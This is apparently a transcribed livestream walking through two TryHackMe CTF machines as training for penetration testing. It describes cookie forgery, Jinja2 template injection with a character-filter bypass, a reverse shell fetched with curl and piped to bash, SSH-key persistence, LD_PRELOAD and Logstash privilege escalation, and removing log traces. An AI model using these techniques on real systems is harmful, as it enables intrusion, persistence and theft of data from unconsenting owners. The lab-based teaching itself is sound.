Okay, looks like there was some technical issues with the stream. Okay, looks like there was some technical issues with the stream. Okay, looks like there was some. Okay. All right. So, I wanted to show you all a good box that I did recently, or actually, I did this particular machine about a couple, maybe like 6-7 months ago. But the thing that's really cool about this particular box is it shows a really cool exploit that is not really talked about as often. Usually, you see like some kind of like in a lot of CTFs, you see some kind of backdoor kind of thing. Like you see some cmd.php, or you upload a file or something like that. And so this is just going to be like a demonstration of a penetration test on TryHackMe, and I hope that a lot of you can learn from it. And the thing that's really important about penetration tests is that it's extremely important for finding vulnerabilities so that companies can patch their vulnerabilities. And so as an ethical hacker, you're going to be finding these vulnerabilities and notifying your clients so that they can patch those vulnerabilities and then just harden their system so that adversaries cannot penetrate the system and cause a lot of damage. So I started up this machine in advance so that we wouldn't have to wait for it. And we see that we're given an IP, and we're just told, can you overcome the forge and steal all of the gold? We're also told that this machine, or at least this room, is called Keldegrim Forge, which is a reference to the game Skyrim. I mean, not Skyrim, RuneScape, which is another cool part. That's a game I used to play back in the day. So let's start. Let's start with this box. So we have Keldegrim here. And the most important thing to start off with is you enumerate all the ports of the box by I copy what IPsec does. We have -sv for default scripts, sv to enumerate versions, OA to output all formats, and then we have the IP here, which is 10.10.127.96. It's going to take some time, so I already ran it, looking at the results. Okay, just like how IPsec talks. We have port 22, it's open on SSH. So we have Ubuntu, so we know that we're dealing with an Ubuntu machine. And we also have port 80 open, which is WorkZug, HTTPD, and we see Python, which is quite interesting. Usually you don't see web pages running on Python. It's usually either like PHP or you see some kind of Apache server. So let's just go to this HTTP service. The reason I'm not starting with SSH is because we're not going to be brute forcing usernames and passwords. That's just going to take forever, and it's very likely to not work. So we're just going to start with the web server, which it tends to be the biggest attack surface for just any machine in general. So let's go to the website on 10.10.127.96. And we see that we are met with this web page here. It just says, welcome to the Forge. Here at the Forge, blah, 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 some games. We have a couple of directories. So as I'm looking at those directories, I'm going to perform a GoBuster search, which basically all it does is just enumerate the directories of the website. So GoBuster dir for directories, -u, which specifies a URL. And it's on HTTP 10.10.127.96, and we're going to specify word list, which is -w. And I have a word list here from SecLists. This is also a word list that IPsec uses. It's a really good word list, and it will enumerate all the directories for us to see. So we have admin here, which is definitely an interesting directory. But anyways, as this is running, we're going to look at this website. So we have welcome to the Forge. We can click on services. Now we are in the services directory. We just see special services, find the fastest services in OSRS, whether you need to max out your skills, do terrible quests, or get your infernal kit. We also have here a copyright in 2020, which might reveal that maybe this server was not updated since 2020. It doesn't necessarily mean that, but definitely could. I think this particular room came out in 2020, so I'm not going to be looking for any kind of CVEs for this website. We can look at our team. So we have two potential users. We have Jed and we have Jad. So that's definitely something that we should note down here. So let's put in users.txt. We have Jed and Jad, which may or may not be useful for later. We can check the HTML source, see what's over here. Doesn't seem to be anything particularly interesting. We could look at the potential metadata for these images to see exactly, well, not exactly, but we could see approximately when the server was updated. So now that we have this picture, we can run the exif tool command on it to show all the metadata. We see here that it was last modified on November 2020. So that could potentially mean that maybe the server itself was last updated November 2020, but not necessarily. It just gives you just a little bit of recon on the server. Okay, so let's look at buy gold, World of Warcraft. Just we can press buy. We see that nothing is happening really, as you can tell also in the bottom left corner where it says /wow and then the number sign there. That just doesn't do any particular action, so doesn't do anything interesting. We click on RuneScape 3, same exact thing. We have admin here though, but we cannot click on it. So from our GoBuster search, we see that there's this /admin directory and its status is 200, which means that we can go to that website. I mean, we could go to this directory. So let's click on /admin here. And we are just back to the home page. So at this point, we enumerated the directories. We didn't find anything interesting. We saw that this particular website is up to date, relatively. And at this point, I guess we could just check the cookie. Maybe there's a cookie on that this web server serves. And we can see that it does. It's a cookie called session with a value of this base 64 encoded string here. So we can look at the string, see what's really going on here. So echo -n, -n just means echo this without providing a new line, as you can see. Echo -n, and we pipe it over to base 64 and -d, which is decode. And when we do that, we see that it decodes as guest. So it's likely that the web server uses this cookie to identify clients to see what their permissions are. Are they a guest or are they an admin? Well, let's see what happens if we do echo -n admin and we encode it back into base 64. So we can take this string, we copy it, and we put it right here, and let's see what happens. I refresh the page and we are automatically redirected to the admin panel. And in the admin panel, we can see current user $2,165, and we have a sales cookie here. All right, before looking at that sales cookie, let's look at the source code. So here, the HTML source code doesn't show anything particularly interesting. We have current user $2,165. So let's look at this cookie. And this is where the website is probably getting the $2,165 value. We can verify this by let's give us, I don't know, 1 million. Let's give us $1 billion and see if this server is actually finding that $2,165 value from the base64 string. Let's see. Alright, so after refreshing it, we now see that we have $1 million. So, I guess that's one way that you can make money, but we are not here to make money. We are here to penetrate into the system. So, what can we do? Well, recall that this web server is running on Python here. Works on Python. So, whenever you see that a website is running on Python, it's always important to check if there is some kind of server-side template injection vulnerability. And what that is a vulnerability in which the server, it takes your input, in this case, this input right here, this $10,000 or $1 million, and it takes your input and integrates it into the actual HTML website code. So what happens behind the scenes is the server is taking our input and is taking all of this HTML code right here, all of this, and it's probably saying something like, taking this and then it says plus current user plus sales cookie plus, and then all of this. To demonstrate that, I'll show you what exactly I mean. So we have SSTI here. So we have some HTML cookie, let's say, oh, here, I'll put it in HTML. SSTI.html. So we have some cookie, let's say, hello, this is a website. This is our code here. And then it's saying, okay, take this cookie, this sales cookie, and concatenate it to, all of this is in quotes, by the way, just like this. Template equals all of this. Here, I'll put it in Python actually, because this server is running in Python. It says template equals all of this, and then what it does is take this sales cookie, concatenate it to this template, and just keep on going. So, yes, this is a great website. And that is our template. And then what it does is it renders the template. It does render underscore template, just like that. And this is vulnerable because it's rendering our user input right here in conjunction with all of this. So what we can do is provide some kind of payload here to make the server evaluate our code. And how that looks is something like this. We have this kind of input here. We do 7 times 7 to see if the server responds with 49. So we enclose it in these curly braces because that is just how Flask or Jinja 2 works, which is a template rendering software. So we have this 7 times 7 here. We could do echo-n 7 times 7, just like this. And base64 encode it. I'm going to add this -w0 flag here because what this does is it doesn't return a new line, just like that. And then I'm going to just copy it with xclip -cell clip. So now I have it in my primary clipboard. Okay, so now I'm going to paste that in, refresh, and see what happens. Now it says current user 49. Well, that's interesting because we actually put 7 times 7, so why didn't it literally print out curly braces 7 times 7? And that shows that this server is evaluating our input. So at this point, since we know it's performing an evaluation, we're going to want to get a reverse shell or do some kind of system command. Let me stop this Go Buster really quick. So let's look online for some payloads for this server-side template injection. So we have SSTI injection, just like this, and we're met with multiple results. We have this Hacktricks website here. There's also a very nice website on Medium. Where was it? I think SSTI in Flask. Here it is. And this goes over step by step how to find this vulnerability and exploit it. There's this MRO function. What you do is basically actually I'll demonstrate a very small part of it because there's a better way to do this, but this is an instructive way to show you. We have this config. Oops, not like that. Where config dot from object OS. And what we're doing here, we just want to see the OS objects of this server because we're going to want to use the OS module, the Python's OS module to get code execution. So print this in, refresh, and see what happens. It says none, which means there might not be an OS object here. So what we could do is config.iter items and see what all the items are, all the objects of this server. Oops, internal server, that means I did something wrong with the, let's see, where is it? Config.items, that was it, not config.iter items. Config.items, okay. And we see all of these different items, including the secret key, which says, if only this was a flag. Okay, well this is a CTF, so it's not going to show an actual API key, but otherwise this would be an API key. So you would just leak that, and this, you can already tell that the server-side SSTI, server-side template injection, is a critical vulnerability. Okay, well let's leverage this to code execution. So we have this Hacktricks, and in this Hacktricks website, there is a payload here that gives you remote code execution. Now there's two ways to get the remote code execution. You could either do what this guy did right here, is you enumerate all of these different classes until you find a certain class called subprocess.popen. And you leverage this subprocess.popen to get code execution. But in this particular website, there is an even better way, because then you don't have to enumerate all those objects and find the exact point where there is that subprocess.popen object. So we have this payload right here, and we can use this payload to get code execution. So let's just remove that. And instead of ls, I'm going to perform a ping on myself. So ping-c1, which means I'm going to ping myself once. And my IP is, let's see, IP is 10.9.66.149. Okay, let's copy that. Put that in this cookie and refresh. It says there's an internal service error. Maybe ping. Let's just ping myself just like this, and let's also perform a sudo TCP dump. so that I can catch this ping request. Oh, here, let me put -n ICMP to make sure that it's only catching pings, not like me requesting the server. And we're still given a server error. Okay, so let's go to plan B. Instead of ping, let's just do ls. Nope, still a server error. Alright, so at this point, I tried this particular payload before and it did work, but I'm not sure why it's not working right now. So what I'll do is I'll go to this, let's see, where is it? This particular payload right here. As you can see, it uses what that other guy did, which is you got to enumerate all the different classes, and eventually you find the point where the subprocess P open object is, and then you can perform your payload. So I'll do it the plan B way. So first thing we got to do is we have to find the classes, and to do that we do this particular payload. What this will do is it'll enumerate the classes that are on the server, and then from that we can find the subprocess, the popen subprocess class. Okay, so let's copy this. Oh, you know what? I think I know what it is. I think it's because of these single quotes here, and that there's single quotes inside of this cookie as well. So maybe that might be what's messing it up. And yeah, that was it. So the problem was that there's single quotes right here and right here, and what I was doing was enclosing it in single quotes. So it was kind of messing up on what do I copy here. So it didn't really copy the payload. So instead of these single quotes here, I'll put these double quotes. And now we should see, and instead of this ping, what this will do is it'll constantly ping my machine over and over and over again. So I don't want to ping my machine multiple times. So I'll just make it ping myself once. So let's put this in here, refresh, and we see this ping. So we have verified that we definitely have code execution here. So let's get a reverse shell. And I'm going to use this rev shell tool, which can easily output any kind of reverse shell you want. You just press rev shell -T and C -P, whatever kind of port you want. -T stands for type, whatever kind of type of shell that you want. So we want netcat. Of course, you can do bash as well, or we got to specify port. Let's specify 9001. And I like this NC one because this one, in my experience, has been the most reliable. That this works a lot more often than bash-C, bash-I. So we're going to do that and copy it. And by the way, if you want this tool, I'm just going to do a shameless plug right here. You just got to go to 0xd4y GitHub. This is my GitHub, and just go on and click rev shell, and you can just copy it, download it right here. Okay, so after getting that, by the way, here's also the output of that ping. The actual server shows it. So after finding this vulnerability, let's get a reverse shell. So let's paste it right here. Now we have a reverse shell, so we should listen on port 9001. Paste this cookie in, refresh, and we get a shell. So now I'm going to just stabilize this shell by importing a PTY using Python 3. So Python-3 import PTY, pty.spawn bin bash. And let's just Control Z to background it. Export term equals X term. So what this did, oops, did I? You know what? Let me redo this shell real quick. nc-lvnp 9001. Refresh. Okay, Python-3 import pty.spawn bin bash stpy raw minus echo export term equals X term. Alright, so what that did is it stabilized the shell. So now I could do like Control C's without killing the shell. I can clear the screen by doing Control AL. And now we have a shell in the box. So let's enumerate it. We have user.txt. We have app as well. Let's look at app. So this was probably most likely the app that was running on the server itself. Let's look at cat app. Let's let's copy this and put it on our host system so that we can see color coding. So it's called app.py. Oops. Did I not? Oh, I copied it using this clipboard. Okay. So we can see here that this was the secret key that was read from config.items, that payload that we did. And this is just the source code of the website. As we can see here, this is the render template string that I was talking about earlier. Let's look at where our input is. Our input is not here because our input is on the admin particular site. So let's see, where is it? /admin, is that here? Yep. There's admin. If session.inRequest, we look at admin equals cookie check. This is how it checks if you are an admin or not. It says if you are a guest, then it gives you a guest. If you otherwise, you have the admin services. And let's look at where there is this it /team admin-r by.py. Looks like in by.py is probably where the vulnerability is. So this is the admin. It does a base 64, does decoding or encodes these 2165, and then it renders a template and it says temp equals 2165. That's only if you did not provide it a cookie. Now, since we did provide it a cookie, what it does is it renders this template, admin.html, which was this right here. This is admin.html. And it takes this cookie right here, the sales cookie, which was put in as, which is called decoded. And what decoded goes into this template string. This template then gets rendered and is sent to temp. And then finally it returns admin.html with this rendered template. So that's how we got code execution. Okay, so now that we are this user, we can enumerate, let's see, the local users on this box. Let's only get people who are having a shell. So we only have root, Jed, and that's it. So only 2 users on this box that have a shell. Looking at this directory of Jed, we don't particularly have a password, I don't think. Let's see, grep pass-r. Okay, we got JavaScript, which is ugly, but let's Oh, too much JavaScript. Looks like there's no password anywhere here, so we can look at maybe there's some kind of port that's open. We see there's only 83 and 22, and this is our reverse shell. We see here that it's connecting through NC through port 9001. So this is our reverse shell right here. So, you know, of course, if there's some kind of, if there are defenders on this box right now, what we just did would be a pretty bad idea, because it's very obvious that there is a malicious actor on this box. Alright, so the next thing to do is try sudo-l. And we see that we have, we can perform this PS function without needing a password. See, we wrote sudo/bin/ps. We executed it using sudo without needing a password, because it says all no password. But sudo is not a vulnerable function to run as sudo, as you can see from GTFO bins. If you go to GTFO bins, which just shows just multiple different ways to exploit binaries that you have sudo access to, or maybe some kind of capabilities. We type PS, and PS is not on here. But there is an LD preload right here. So we have this privilege of LD preload, and what we can do is we can leverage this to load a shared object, and this shared object will be malicious so that we could get a reverse shell. And so therefore we could run PS, which would load this shared object, and therefore we would get a reverse shell. So let's look at LD preload privilege escalation. And we have an article here from Hacking Articles. And what this guy says is you just create a you create a program in C that looks like this. Let's call it shell.c, set paste. So what this does is it just creates a shared object. It sets the group ID and the user ID to 0, which is root, and then it executes bin.sh. So after making that program, we have to compile it. So let's do that right here. All right, and now we see that we have this shell.so. After we do that, we do this sudo ld underscore preload. So we're loading the shared object. And then, after we load this shared object, we execute PS. And just like that, we are root. Now, this shared object, if you're more familiar with Windows, is like a DLL. So you're just loading some kind of compiled binary, and then you get code execution. And I can show you that here in ld underscore preload. Let's see it right here. ld underscore preload is a list of additional user-specified ELF shared objects to be loaded before all others. This feature can be used to selectively override functions in other shared objects. So when this PS function is loading a shared object, the first thing it does is load our malicious shared object. That's hard to say. And then we get this shell as root. Okay, so we can look a little bit at the var log just to check, our activity here. You can see auth.log if there's anything suspicious. And yep, you can see Jed should probably not be executing sudo command with something called shell.so and loading it with an LD preload. So, just looking at the blue side, what all of our actions look like is very important as an attacker, because if stealth is something that you're looking for, then as root you should definitely make sure to remove any kind of activity that looks suspicious. So we can say that we fully rooted this box. We're root, so let's go to the next box. And so this next box is called. Actually, before I continue, are there any questions? Okay, looks like there are no questions. So let's go to the next box, which is Temple. Okay, we just have to wait for this to load. It's going to take a little bit of time, but this box is kind of like the previous one that we just saw, Keldegrim, except it's a more advanced. And the reason it's more advanced is that not only is the privest harder, but also the server-side template injection, we have to bypass filters on it. So some mitigations that we have against server-side template injection is such as filtering bad characters. So as we saw in our payload that we used underscores, for example, and we used single quotes. Now, if you're rendering some kind of user input into a template, maybe you want to filter that, because maybe you're not expecting a cookie that when you decode it should have these kind of special characters. So this particular box that we're going to look at called Temple does that function. It has a filter on bad characters. So let's go into Temple and look at, so we the same thing. We do nmap-sc for default scripts, sv, enumerate all versions, OA, output all formats, put in nmap, and then we take the IP, which is this, and we perform this command. But I already ran it because it does take a while, especially since now we have this port on 61337, which is not a regular kind of port that you'd normally see. So you would have to enumerate all the ports and then find it eventually. Okay, so I already did that. We have this echo service on port 7, which is interesting. You normally do not see echo open on a system. We have SSH open on port 22, and it is an Ubuntu machine. We have Telnet open on port 23. And HTTP Apache on port 80. And on port 61337, we have Python works up, just like we did in our previous box. Alright, so I'll just start going from the bottom up. So let's start with this port 7. Echo. Okay, so let's just do an NC on that. So we have, it was 10.10.160.76, port 7. All right, let's say hello, and it echoes back hello. Let's say hi, it echoes back hi. All right, let's put a bunch of special characters here to see how it reacts to that. And it just echoes it right back out. So it's likely this isn't something vulnerable. In fact, this particular port is used a lot for debugging on servers, so nothing there. SSH I won't test out. It's pretty up to date. It's 7.6. We can even look up Searchsploit SSH. Open SSH. And 7.2 is the last vulnerable, so to speak, version. It's just user enumeration. We see actually here 7.7. I have tested this before. This user enumeration thing is very, very unreliable. Sometimes it has false positives. Sometimes there is a user that has a certain, that it does exist on the server, but does not say that it does. So it has false negatives and false positives. It's completely unreliable. All right, so let's look at the HTTP service. close out all these tabs. So we just have a default Apache page. So let's just while we're looking at this, for example, let's enumerate the directories on this default Apache page. And I'm even going to put the PHP extension just in case, maybe if there are PHP files, then we'll be able to see that. And we will output all of those directories in root.bust. So it looks like I misspelled this. Alright, there we go. Alright, so as we're getting directories in that, let's look at port 61337. So we're met with a login page. We can try putting in some SQL statements, or just like a single quote to make it react weirdly. And it says hacking attempt detected. You have been logged as this IP, which is my IP, and it says detected illegal characters in username. Alright, let's just put A in username. Invalid username and password. Okay, so right here I'm typing in a single quote in the password. Let's see what happens. And it says hacking attempt detected. So single quotes are not allowed. How about underscores? Underscores allowed. Hacking attempt detected. So we know that single quotes are bad characters. We know that underscores are bad characters. But double quotes are not bad characters. However, it does not result... Oh, here I have detected illegal characters in password because I had an underscore there. Now let's have an A. So we see that double quote is actually fine. And yeah, in this Apache server, we're just getting a bunch of 403s. Alright, so in the meantime, let's just enumerate the directories of this website right here on port 61337. Oops, -w for, or -u for URL, -w, and what I'm going to do here is use a shorter word list, which I kind of modified so that it would be very small, so that it wouldn't take a long time just to bust these directories. So let's see what we get. So we have all of these directories present on this server, on this website on 61337, and admin we cannot access because it's 4.3, which is a status code for forbidden application as well. Going to account, external, home, and internal will just redirect us to login. Here, I'll demonstrate that. And it's likely what the server is doing here is when I access internal, it checks to see if I have any kind of authorization cookie. And if I do not, then it just redirects me to login. Okay, so we go to login, we have logout, and we have temporary, which is a very interesting directory. So let's bust this directory to see if there's any subdirectories that are present within it. So we see that there's actually this dev directory that's inside of temporary. So let's put in dev here to see if there's any subdirectories inside of dev. Okay, and we have new accounts. So let's go to /temporary/dev/new account, and we are met with a register form. So let's put in test@test.com, ABC. And password is 12345678. Usually it must be 5 characters or longer. Okay, ABCDE. And before I press login, let's intercept this with Burp Suite. And what Burp Suite will do is it'll just intercept the request that I send so that I can modify it. Sometimes like the user interface of a website will not let you perform a particular action, but if you can just modify your request through Burp Suite, then you can nevertheless perform that action. Okay, so we have email, test@test.com. This %40 is just Unicode for test. And we have our password right here. So let's press send. and we see that it says success account created. So let's turn off this proxy. So now we go to 160.76 test at test.com. 1 2 3 4 5 6 7 8. Was that, did I typo? Test at test.com. 1 2, oh, ABCDE was the website. It was the username. Alright, it says welcome. The main dashboard is still under development. Stay put for more features. And it says logged in from source 10.9.66.149. Which is interesting. So it takes our IP and it displays it right here. And we have an email that says support at templeindustries.local. So let's add this to our Etsy hosts file. And this file is just basically our local DNS cache. So the first thing that will happen is that in DNS, your like when you type in a URL such as google.com, the first thing it looks for is your local DNS cache to resolve google.com to an IP. Now DNS is quite deep. I'm not going to go over all the intricacies of it, but all you have to know is that the first thing it looks for is your local DNS cache. So let's go to 10, or what was it? 10.10.160.76 and see if there's any kind of virtual host routing when we do templeindustries.local. And what that is some websites, they have a DNS that's configured so that when you access a certain URL like templeindustries.local, it will redirect you to a particular website that, let's say if you had app.temple.industries.local, it'll show you a different website completely. So looks like it does not have virtual host routing on this server. We can click on internal news. Nothing interesting in all of these web pages, but we do have account here. And it says logged in as ABCDE. So we have our username right here, and the website is displaying our username. So that is something that we have control of, and it's very easy to control. It's not like our IP here, where we could write whatever kind of payload that we want. When in our username field, it's a lot easier to write a payload. But if you remember, we used for this previous box. We used underscores, which were not allowed, and we used single quotes, which were also not allowed. So how are we going to try to exploit this server-side template injection vulnerability when we can't even use underscores and single quotes? Well, that's where bypassing these characters comes into play. And before we assume that there is some kind of server-side template injection vulnerability just because it's Python, before we assume that, let's verify that by doing 7 times 7, just like we did in the previous box. So we do 7 times 7. It says email already exists. All right, so test1 at test.com. And it says account created. Okay, let's go here. Where is it? Log out. Let's do 7 times 7 and put the password of 1 2 3 4 5 6 7 8. We go to account and it says 49, just like the previous vulnerable box did. So we know that there's server-side template injection. So let's find some kind of payload that bypasses these characters. So we can do SSTI bypass of these characters, and we find this website right here. And what this website has is a payload that results in code execution that has or was it the, I don't think it was it SSTI bypass filters. Let's see here. You know what, we will look at this first website first, and if it does not have the correct, what was it, Chowdhury if it does not have the payload that we want, then we can find some other website. So one of the ways that a lot of servers, how they execute strings is that you don't necessarily need to put like specifically underscores just so that they can render your string. You can also put hex values, like if you look at the ASCII table, we look at underscore. Where's underscore? There it is. Underscore is 5F in hex. So if we were to replace 5F, or replace our underscores with 5F, then maybe we can actually get code execution, and that the illegal hacking characters problem will not be triggered. You know what? Let's start. I have not tried this previously, so I'm going to do this live. Starting the payload, we'll try out that payload that we got from Keldegrim. What was it? It was on Hacktrix. This payload way down here. I'm going to do this live here, so let's hope the demo gods are on my side. Way down here there was something. There it is. Okay, so you remember this exploit worked, or this payload worked with the previous box. So let's take this payload. We want to replace all of these underscores with hex 5F, which is like this, 5F, just like that. And then we want to replace those single quotes with double quotes, because those were allowed but single quotes were not. Okay, now let's take this payload. Copy it. And let's use this as our username and see what happens. Alright, test 2, because we have to create a new email. And let's verify. Yep, it says account created. Let's see what happens. 1, 2, 3, 4, 5, 6, 7, 8. Account. And internal server error. Let's see, what was it that we were doing? We wanted ls. Well, looks like this will probably not work, because if this were to work, we would not have received an internal server error. Instead, we would have gotten like the actual output of ls. So, looks like the demo gods are not on my side. We will choose a different payload. Let's see if this is one. Nope. I'm going to do one that I know definitely works. So after a lot of researching, I found this website. And this website has tons of different payloads for server-side template injection. Specifically, it's got one that, I think this was the one. Is this it? Oops. Let's copy this. This, or maybe it was this one. This looks more like it. Okay. So we have this payload right here. It does this huge hex 5F, and if you want to decode this, it looks like this /_/G. This is what our payload looks like. Note that we want to replace the single quotes with double quotes, and then we're good. So let's do that really quick. We want to replace those single quotes with double quotes, and let's see what happens now. So we cat the payload, copy. Let's go to Burp Suite, test 3. And let's paste this payload. Alright, what do we see? Account created. Okay, great. Let's go back, log out, paste 1, 2, 3, 4, 5, 6, 7, 8. Don't save, account, and our ID command got executed. Great, so let's get a reverse shell. Rev shell -tnc -p9001, our trusty over 9000 port. And oh, I accidentally, here, let's copy that here. And this ID, oops, let's put this in a new pane. Rev shell -t, okay. So now we have that. Let's copy that. And put this as our username. And we want to do test 4. We can see that this is in black, so we're going to have to URL encode this. Alright, there we go. Hacking attempt detected. You have been... Okay, let's see why that got triggered. So we have double quotes everywhere. Maybe this remove command has some characters that are not, this reverse shell has characters that are not allowed. So what I'm going to do is make a www directory, and I'll do this same reverse shell, except this time I'll output it to a file called shell, so we have it right here. There's shell. And what I will do is I'll set up a web server that's running on that's running so that the server can curl our web server. So the server can curl our web server and then execute our command. Okay, so now we have our server up and running. So let's do this. Instead of that, what we're going to do is curl 10.10 or 10.9.66.149 / shell and pipe it over to bash. This is what we want. Oops, what happened over here? Alright, there we go. Copy to that. Let's paste it right here. URL encode that. And send. Alright, now let's see if it, nope, no more of the hacking attempt detected. So let's go over here, log out. There, 1, 2, 3, 4, 5, 6, 7, 8. And go to account. So we saw that it hung there, and now it says logged in as blank. If we go right here, where is it? Right here. We see that a GET request was performed on our shell. So it definitely curled our shell, but we did not receive a reverse shell. So maybe there's a problem with the reverse shell. Let's, instead of netcat, use bash. And this is what our payload looks like. Alright, let's refresh. Does the GET request again, and now we get a shell. Okay, so let's just establish some persistence before I proceed any further. So remember there was an SSH port open, so we're going to want to get an SSH shell because that's a lot more stable than just a reverse shell. So SSH-keygen, let's call it Bill because our user is named Bill. And we have bill.pub here. Let's copy this right here. And echo this. Let's first go into cd.ssh. Authorize _keys. And now we can be Bill on this server. So we SSH as Bill. We specify the key. Actually, before we do that, we have to do... I guess I'll show you first. we'll do build.key right here. And what this does is saying we want to SSH, we want to log in as Bill. We don't know his password, but we do know his key because we just put it there. Okay, so then it asks us for a password because build.key not accessible, no such file or directory. What? Oh, just called build. Alright, well, let's just put build. Yeah, and when I first did this box, I realized that a lot of the times this box would be hanging. It would be a little bit annoying, but it is what it is. There we go. Now we got a nice shell as build. So we can see right here, we have the first flag, user.txt, or flag1.txt in this particular case. We can try sudo-l, just like we did in the previous box. Does not work. It says permission denied. We can look at web app, and we see this webapp.py right here, which is the workzug code, source code that we just exploited. So let's copy this, put it in web.py. Oops, wrong clipboard. There we go. So we see here, this is the secret key of the server. So then we have the if any character in bad characters for character and value, hacking attempt detected. Well, what are the bad characters? Let's see. What bad characters are: single quote, underscore, pound sign, and semicolon. So if we had any of these values in our username, it would not have worked. But we were able to bypass that by using x or /x5f instead of underscore, and then double quote instead of single quote. Okay, so let's look at that account page, because that's where we really got our code execution. So it says that if it just checks if we have a session, if we are logged in, and if we are, then it goes here. And it says current time equals that, current IP equals what our IP is, in my case 10.9.66.149. Then we have this template here. And this template is just the HTML code of the website, but here's the interesting part. We have plus username logged in as plus username plus. So when we do server-side template injection, our data type for our template is a string. So that's why you can just easily concatenate it to a template, and that's what a lot of developers do. It's just easy that way. So after doing that, what it does is it renders this template, uses this render template string function, and this is where our RCE comes into play. Okay. One more thing about web.py is that at the bottom here, we have a password. We have temple user, and we have a password of this secure looking password. And it looks like this is something for MySQL. Okay, so we look at MySQL. Let's go to this right here. MySQL-u. We saw that the user was temple_user. And the password was that long secure string. So let's look at the databases. We have temple. Let's go into that and show the tables. Here we have users, the table users. So let's select star from users to dump everything that we have. And what we have is this admin account. Username admin, password this. And after trying to crack this password, it's some kind of secure password. I was not able to crack it. But we see here our other usernames here, ABCDE, and this is our payload and our password, which is 1234567 Note that this is a SHA-224 sum, and the reason I know that is because if we look here, where was it? SHA. There we go. It takes our password and it puts it in SHA.224. So, nothing interesting in the MySQL server because we were not able to crack the admin password. So, what's the next thing to see? Well, we can look at the processes that are running on the server. And the things that we are really interested in, because we're already Bill, so we're only interested in root, because that's the only user that we have to escalate privileges to. So looking at root, we have all these different processes, and then we have this super long one called calling logstash in Java. Now if we do some research on logstash, we find out that it is possible to escalate privileges as long as there are some kind of misconfigurations present. So we have, what this article says is that you are able to escalate privileges as long as you have write permissions to some kind of config file that's relevant to logstash, or there's some kind of wildcard, such as something contained within pipelines.yml that we can take advantage of. Let's see if we have, and the reason we can take advantage of it is if we have write access to it. So if we look at this pipelines.yml, we see that it's read-write access, read-read, and it's owned by root, so we don't have write access to it. But let's look at it to see if there's some kind of wildcard that we do have access to. So we see that what this looks at is it looks at any kind of config file present within this directory, config.d. And anything that ends in conf.conf will be loaded into logstash. So let's go into this. We look at all the different files here. There's only one file called logstash.sample.conf. By the way, we could exploit this misconfiguration if we could create some kind of file, let's say file.conf. We don't have permissions though, because we only have read and execute permissions within this directory. Okay, so let's look at this config file. We see there's nothing inside of it, but we do have read-write access to it. So let's let's put some kind of code in it that will execute upon the loading of logstash. And so we see right here that there is a payload right here that this website gives, and it performs a whoami function, and then the output of that function gets put in /tmp/output.log. So let's copy this. I remember that I was unable to copy that, so let's do logstash privesc. Let's get a payload right here. For some reason I'm unable to copy it from that particular website, but let's copy it from here. So we are performing this, and what it does is it performs it every 120 seconds. We don't want to sit here forever, so let's do 5 seconds. So we should expect that in TMP there will be an output .log file. Might take some time. We note that we also have to wait for this loading to happen again, so that might take a minute or two. While we're waiting, we can look for some users that are present on this box. We have Frankie and Princess. If we go and look in the /home directory, we want to only see Frankie and Princess, so I'm redacting Bill outputs from this command, and we see that there is nothing interesting. There is bash history, but if we look at this, it just goes straight to dev null, and then Princess doesn't even have a bash.history directory. Okay, so let's see if there's the output log is here yet. Still no. Might have to wait a little longer. And there we go. Output.log is there. So we look at output.log. It says command who am I, and the message is root. So we have confirmed that we have code execution here. So let's go back to our config file. And instead of who am I, let's do a reverse shell. Rev shell-t bash this time, 9001, and paste that in. And let's set up a listener on 9001. So at this point, just waiting for the command to get executed again, and then hopefully we get a shell. And there we go, we get a shell as root. We go to root. There we go. Second flag. We have script.sh right there. Let's see what that is. And what that did is every 30 seconds, that's why it took a while. Every 30 seconds, the log stash service gets restarted. By the way, we knew in advance that this would happen, that this would work, because in this article here, you see that it says further, one of the requirements must be met. You're able to restart the log stash service, or this file contains the entry config.reload.automatic true. And what that is that the service gets automatically reloaded during some kind of cron job. So we look at here, and it does have that feature, that characteristic, config.reload automatic true. So that was this box. I hope you learned something about server-side template injection, both from Kelvigrim and then this more advanced box here, which was Temple. This was a hard box on TryHackMe, and Kelvigrim was a medium box on TryHackMe. But I thought it was very interesting to see the payloads and how you can bypass certain filters such as underscore, and of course you could use double quotes instead of single quotes. And it's very important that when you're rendering a template, that you do not put user input directly into the template. Okay, well, I hope you enjoyed this stream and that look at those two boxes. Are there any questions before the stream ends? Okay, so there are no questions. So thank you for coming. Thank you for watching this live, this video, whether it be 5 years, 10 years from now, whatever it may be. Thank you, and have a good day or night.